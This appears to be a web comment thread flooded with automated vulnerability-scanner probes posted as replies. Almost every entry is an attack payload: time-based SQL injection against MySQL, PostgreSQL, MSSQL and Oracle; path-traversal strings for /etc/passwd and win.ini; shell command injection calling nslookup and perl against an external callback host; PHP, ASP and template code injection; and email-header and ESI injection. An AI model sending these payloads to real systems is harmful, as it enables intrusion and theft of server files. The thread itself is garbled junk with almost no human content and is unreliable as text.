'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Eric Yu
'||(select 1 from (select pg_sleep(15))x)||'
re: Eric Yu
''||(select 1 from (select pg_sleep(15))x)||''
re: Eric Yu
1'"
re: Eric Yu
@@PfNR2
re: Eric Yu
41ZnLLzj
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
-1 OR 2+829-829-1=0+0+0+1
re: Eric Yu
-1 OR 3+829-829-1=0+0+0+1
re: Eric Yu
if(now()=sysdate(),sleep(15),0)
re: Eric Yu
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Eric Yu
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Eric Yu
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Eric Yu
-1; waitfor delay '0:0:15' --
re: Eric Yu
-1); waitfor delay '0:0:15' --
re: Eric Yu
1 waitfor delay '0:0:15' --
re: Eric Yu
o9NG4O7J'; waitfor delay '0:0:15' --
re: Eric Yu
-5 OR 285=(SELECT 285 FROM PG_SLEEP(15))--
re: Eric Yu
-5) OR 680=(SELECT 680 FROM PG_SLEEP(15))--
re: Eric Yu
-1)) OR 819=(SELECT 819 FROM PG_SLEEP(15))--
re: Eric Yu
hD6bMfWo' OR 711=(SELECT 711 FROM PG_SLEEP(15))--
re: Eric Yu
Dk8CNAT5') OR 984=(SELECT 984 FROM PG_SLEEP(15))--
re: Eric Yu
kaK6d6Rt')) OR 460=(SELECT 460 FROM PG_SLEEP(15))--
re: Eric Yu
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Eric Yu
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Eric Yu
'||(select 1 from (select pg_sleep(15))x)||'
re: Eric Yu
''||(select 1 from (select pg_sleep(15))x)||''
re: Eric Yu
1'"
re: Eric Yu
@@SM8qC
re: Eric Yu
1xxd5fgpO
re: Eric Yu
response.write(9883855*9528448)
re: Eric Yu
%0abcc:074625.67-10043.67.e61b0.19990.2@bxss.me
re: Eric Yu
'+response.write(9883855*9528448)+'
re: Eric Yu
to@example.com>%0d%0abcc:074625.67-10044.67.e61b0.19990.2@bxss.me
re: Eric Yu
<esi:include src="http://bxss.me/rpb.png"/>
re: Eric Yu
"+response.write(9883855*9528448)+"
re: Eric Yu
${9999709+9999118}
re: Eric Yu
../../../../../../../../../../../../../../etc/passwd
re: Eric Yu
../../../../../../../../../../../../../../windows/win.ini
re: Eric Yu
'.gethostbyname(lc('hitqn'.'ameqanmx323d4.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(73).chr(122).chr(72).'
re: Eric Yu
file:///etc/passwd
re: Eric Yu
".gethostbyname(lc("hitll"."exejkfhf7dd29.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(82).chr(110).chr(65)."
re: Eric Yu
../../../../../../../../../../../../../../../proc/version
re: Eric Yu
)
re: Eric Yu
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Eric Yu
!(()&&!|*|*|
re: Eric Yu
../../../../../../../../../../etc/passwd%00.jpg
re: Eric Yu
^(#$!@#$)(()))******
re: Eric Yu
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Eric Yu
HttP://bxss.me/t/xss.html?%00
re: Eric Yu
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Eric Yu
"+"A".concat(70-3).concat(22*4).concat(122).concat(85).concat(116).concat(87)+(require"socket"
Socket.gethostbyname("hitgg"+"vrqqmafs4e999.bxss.me.")[3].to_s)+"
re: Eric Yu
bxss.me/t/xss.html?%00
re: Eric Yu
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Eric Yu
'+'A'.concat(70-3).concat(22*4).concat(117).concat(76).concat(101).concat(75)+(require'socket'
Socket.gethostbyname('hitli'+'bslvkffm8f007.bxss.me.')[3].to_s)+'
re: Eric Yu
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Eric Yu
/etc/passwd
re: Eric Yu
echo jlksoy$()\ bqxtac\nz^xyu||a #' &echo jlksoy$()\ bqxtac\nz^xyu||a #|" &echo jlksoy$()\ bqxtac\nz^xyu||a #
re: Eric Yu
%2fetc%2fpasswd
re: Eric Yu
&echo idncro$()\ hbjobv\nz^xyu||a #' &echo idncro$()\ hbjobv\nz^xyu||a #|" &echo idncro$()\ hbjobv\nz^xyu||a #
re: Eric Yu
'"
re: Eric Yu
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Eric Yu
|echo hjrnkh$()\ yxvdpk\nz^xyu||a #' |echo hjrnkh$()\ yxvdpk\nz^xyu||a #|" |echo hjrnkh$()\ yxvdpk\nz^xyu||a #
re: Eric Yu
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Eric Yu
<!--
re: Eric Yu
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Eric Yu
(nslookup hitpzrawlyknw18def.bxss.me||perl -e "gethostbyname('hitpzrawlyknw18def.bxss.me')")
re: Eric Yu
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Eric Yu
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Eric Yu
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Eric Yu
$(nslookup hitwzozwnikop689d6.bxss.me||perl -e "gethostbyname('hitwzozwnikop689d6.bxss.me')")
re: Eric Yu
';print(md5(31337));$a='
re: Eric Yu
Http://bxss.me/t/fit.txt
re: Eric Yu
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Eric Yu
&nslookup hitseaewmengkf1107.bxss.me&'\"`0&nslookup hitseaewmengkf1107.bxss.me&`'
re: Eric Yu
";print(md5(31337));$a="
re: Eric Yu
http://bxss.me/t/fit.txt%3F.jpg
re: Eric Yu
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Eric Yu
&(nslookup hitopvzfeouzk49da5.bxss.me||perl -e "gethostbyname('hitopvzfeouzk49da5.bxss.me')")&'\"`0&(nslookup hitopvzfeouzk49da5.bxss.me||perl -e "gethostbyname('hitopvzfeouzk49da5.bxss.me')")&`'
re: Eric Yu
${@print(md5(31337))}
re: Eric Yu
/etc/shells
re: Eric Yu
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Eric Yu
|(nslookup hithbzxuusfug11e98.bxss.me||perl -e "gethostbyname('hithbzxuusfug11e98.bxss.me')")
re: Eric Yu
${@print(md5(31337))}\
re: Eric Yu
c:/windows/win.ini
re: Eric Yu
file:///etc/passwd
re: Eric Yu
`(nslookup hitpxrskqmjan08079.bxss.me||perl -e "gethostbyname('hitpxrskqmjan08079.bxss.me')")`
re: Eric Yu
'.print(md5(31337)).'
re: Eric Yu
bxss.me
re: Eric Yu
;(nslookup hitsycpoepjab161d3.bxss.me||perl -e "gethostbyname('hitsycpoepjab161d3.bxss.me')")|(nslookup hitsycpoepjab161d3.bxss.me||perl -e "gethostbyname('hitsycpoepjab161d3.bxss.me')")&(nslookup hitsycpoepjab161d3.bxss.me||perl -e "gethostbyname('hitsycpoepjab161d3.bxss.me')")
re: Eric Yu
/\../\../\../\../\../\../\../etc/passwd
re: Eric Yu
/WEB-INF/web.xml
re: Eric Yu
C:\WINDOWS\system32\drivers\etc\hosts
re: Eric Yu
../../../../../../../../../../windows/win.ini%00.jpg
re: Eric Yu
/../../../../../../../../../../boot.ini
re: Eric Yu
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Eric Yu
..\..\..\..\..\..\..\..\windows\win.ini
re: Eric Yu
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Eric Yu
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Eric Yu
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Eric Yu
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Eric Yu
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Eric Yu
WEB-INF/web.xml
re: Eric Yu
WEB-INF\web.xml
re: Eric Yu
1
re: Eric Yu
1
re: Eric Yu
-1 OR 2+983-983-1=0+0+0+1 --
re: Eric Yu
-1 OR 3+983-983-1=0+0+0+1 --
re: Eric Yu
-1 OR 2+177-177-1=0+0+0+1
re: Eric Yu
-1 OR 3+177-177-1=0+0+0+1
re: Eric Yu
-1' OR 2+275-275-1=0+0+0+1 --
re: Eric Yu
-1' OR 3+275-275-1=0+0+0+1 --
re: Eric Yu
-1' OR 2+489-489-1=0+0+0+1 or 'OVEzNj6k'='
re: Eric Yu
-1' OR 3+489-489-1=0+0+0+1 or 'OVEzNj6k'='
re: Eric Yu
-1" OR 2+651-651-1=0+0+0+1 --
re: Eric Yu
-1" OR 3+651-651-1=0+0+0+1 --
re: Eric Yu
if(now()=sysdate(),sleep(15),0)
re: Eric Yu
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Eric Yu
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Eric Yu
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Eric Yu
-1; waitfor delay '0:0:15' --
re: Eric Yu
-1); waitfor delay '0:0:15' --
re: Eric Yu
1 waitfor delay '0:0:15' --
re: Eric Yu
wJUGi8CJ'; waitfor delay '0:0:15' --
re: Eric Yu
-5 OR 938=(SELECT 938 FROM PG_SLEEP(15))--
re: Eric Yu
-5) OR 171=(SELECT 171 FROM PG_SLEEP(15))--
re: Eric Yu
-1)) OR 811=(SELECT 811 FROM PG_SLEEP(15))--
re: Eric Yu
KDQncorp' OR 156=(SELECT 156 FROM PG_SLEEP(15))--
re: Eric Yu
AokgOTTJ') OR 956=(SELECT 956 FROM PG_SLEEP(15))--
re: Eric Yu
f6pZKHoi')) OR 577=(SELECT 577 FROM PG_SLEEP(15))--
re: Eric Yu
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Eric Yu
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Eric Yu
'||(select 1 from (select pg_sleep(15))x)||'
re: Eric Yu
''||(select 1 from (select pg_sleep(15))x)||''
re: Eric Yu
1'"
re: Eric Yu
@@4nxMu
@eric ok thanks!
re: guest
hClyQHwK
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+155-155-1=0+0+0+1
re: guest
-1 OR 3+155-155-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
L11oJ6qG'; waitfor delay '0:0:15' --
re: guest
-5 OR 974=(SELECT 974 FROM PG_SLEEP(15))--
re: guest
-5) OR 460=(SELECT 460 FROM PG_SLEEP(15))--
re: guest
-1)) OR 104=(SELECT 104 FROM PG_SLEEP(15))--
re: guest
c5eHOAwy' OR 367=(SELECT 367 FROM PG_SLEEP(15))--
re: guest
VmDuY7YQ') OR 342=(SELECT 342 FROM PG_SLEEP(15))--
re: guest
8VVP1FM2')) OR 701=(SELECT 701 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@0TlXa
re: guest
f1PSX6Hq
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+628-628-1=0+0+0+1
re: guest
-1 OR 3+628-628-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
jg8idYVt'; waitfor delay '0:0:15' --
re: guest
-5 OR 74=(SELECT 74 FROM PG_SLEEP(15))--
re: guest
-5) OR 928=(SELECT 928 FROM PG_SLEEP(15))--
re: guest
-1)) OR 417=(SELECT 417 FROM PG_SLEEP(15))--
re: guest
OAtcZ8Vx' OR 454=(SELECT 454 FROM PG_SLEEP(15))--
re: guest
EEaPrRNl') OR 472=(SELECT 472 FROM PG_SLEEP(15))--
re: guest
joaipMVg')) OR 959=(SELECT 959 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@DxYnW
re: guest
1gDZq8T6O
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
%0abcc:074625.67-10037.67.dc31a.19990.2@bxss.me
re: guest
to@example.com>%0d%0abcc:074625.67-10038.67.dc31a.19990.2@bxss.me
re: guest
${10000274+10000332}
re: guest
response.write(9062293*9707600)
re: guest
'+response.write(9062293*9707600)+'
re: guest
"+response.write(9062293*9707600)+"
re: guest
)
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
'.gethostbyname(lc('hitdn'.'jmvciamx279c5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(81).chr(117).chr(80).'
re: guest
!(()&&!|*|*|
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
".gethostbyname(lc("hittg"."mjpkwcrr816be.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(88).chr(97).chr(84)."
re: guest
^(#$!@#$)(()))******
re: guest
file:///etc/passwd
re: guest
../../../../../../../../../../../../../../../proc/version
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
"+"A".concat(70-3).concat(22*4).concat(99).concat(89).concat(108).concat(81)+(require"socket"
Socket.gethostbyname("hitnx"+"qckopucr3624e.bxss.me.")[3].to_s)+"
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: guest
bxss.me/t/xss.html?%00
re: guest
'+'A'.concat(70-3).concat(22*4).concat(112).concat(88).concat(114).concat(81)+(require'socket'
Socket.gethostbyname('hitub'+'zboxlzpa29523.bxss.me.')[3].to_s)+'
re: guest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: guest
../../../../../../../../../../etc/passwd%00.jpg
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: guest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: guest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: guest
'"
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: guest
/etc/passwd
re: guest
<!--
re: guest
';print(md5(31337));$a='
re: guest
Http://bxss.me/t/fit.txt
re: guest
echo xdbgxp$()\ cilbon\nz^xyu||a #' &echo xdbgxp$()\ cilbon\nz^xyu||a #|" &echo xdbgxp$()\ cilbon\nz^xyu||a #
re: guest
%2fetc%2fpasswd
re: guest
";print(md5(31337));$a="
re: guest
http://bxss.me/t/fit.txt%3F.jpg
re: guest
&echo dxklkz$()\ ujxqkq\nz^xyu||a #' &echo dxklkz$()\ ujxqkq\nz^xyu||a #|" &echo dxklkz$()\ ujxqkq\nz^xyu||a #
re: guest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: guest
${@print(md5(31337))}
re: guest
/etc/shells
re: guest
|echo alcldm$()\ ukapih\nz^xyu||a #' |echo alcldm$()\ ukapih\nz^xyu||a #|" |echo alcldm$()\ ukapih\nz^xyu||a #
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: guest
${@print(md5(31337))}\
re: guest
c:/windows/win.ini
re: guest
(nslookup hitftpizwtarh4f759.bxss.me||perl -e "gethostbyname('hitftpizwtarh4f759.bxss.me')")
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: guest
'.print(md5(31337)).'
re: guest
bxss.me
re: guest
$(nslookup hitfsslyjqzff57046.bxss.me||perl -e "gethostbyname('hitfsslyjqzff57046.bxss.me')")
re: guest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: guest
&nslookup hitvxltxfsuos960af.bxss.me&'\"`0&nslookup hitvxltxfsuos960af.bxss.me&`'
re: guest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: guest
&(nslookup hitktynusagtsb96e5.bxss.me||perl -e "gethostbyname('hitktynusagtsb96e5.bxss.me')")&'\"`0&(nslookup hitktynusagtsb96e5.bxss.me||perl -e "gethostbyname('hitktynusagtsb96e5.bxss.me')")&`'
re: guest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.